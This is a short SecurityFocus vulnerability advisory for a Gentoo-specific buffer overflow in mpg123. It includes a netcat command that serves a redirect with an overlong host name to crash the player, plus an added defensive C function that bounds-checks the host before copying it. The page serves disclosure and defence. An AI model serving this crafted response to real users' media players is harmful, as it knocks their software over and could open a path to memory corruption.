Gentoo-Specific MPG123 Malicious URI Remote Buffer Overflow Vulnerability

The following commands are sufficient to demonstrate this issue by crashing affected applications:

( echo -ne "HTTP/1.1 302 Found\r\nLocation: "
echo -ne "http://fooooooooooooooooooooooooooooooooooooooooooooooooo/\r\n\r\n"
)| nc -lp 8080 &

mpg123 http://localhost:8080/
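
The response served by the commands above is a 302 redirect whose Location URI carries a very long host name. As an added example (not code from mpg123, Gentoo or the original advisory), the following C function shows a client-side check that measures the host before copying it into a fixed buffer and refuses the redirect when it does not fit. The name `redirect_host`, the `HOST_MAX` size and the assumption that the host component is what lands in the fixed buffer are illustrative and not taken from the page.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define HOST_MAX 64   /* assumed size of the client's host buffer */

/* Copy the host of an "http://" Location header from a raw HTTP response
 * into out[outsz]. Returns 0 on success, -1 if the header block has no
 * usable Location, -2 if the host does not fit (redirect refused). */
int redirect_host(const char *resp, char *out, size_t outsz)
{
    static const char hdr[] = "Location:", scheme[] = "http://";
    const char *p = resp;

    if (outsz == 0) return -1;
    out[0] = '\0';
    /* Step through header lines; stop at the blank line ending them. */
    while ((p = strstr(p, "\r\n")) != NULL) {
        p += 2;
        if (p[0] == '\r' && p[1] == '\n') return -1;
        if (strncasecmp(p, hdr, sizeof hdr - 1) == 0) break;
    }
    if (p == NULL) return -1;
    p += sizeof hdr - 1;
    while (*p == ' ' || *p == '\t') p++;
    if (strncasecmp(p, scheme, sizeof scheme - 1) != 0) return -1;
    p += sizeof scheme - 1;

    /* Measure the host first; copy only when it fits with its NUL. */
    size_t n = strcspn(p, "/:\r\n");
    if (n == 0) return -1;
    if (n >= outsz) return -2;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample response, shaped like the one served above. */
    const char *resp = "HTTP/1.1 302 Found\r\n"
                       "Location: http://media.example.test/a.mp3\r\n\r\n";
    char host[HOST_MAX];
    int rc = redirect_host(resp, host, sizeof host);
    printf("rc=%d host=%s\n", rc, host);
    return rc == 0 ? 0 : 1;
}
```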

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


 

Copyright 2010, SecurityFocus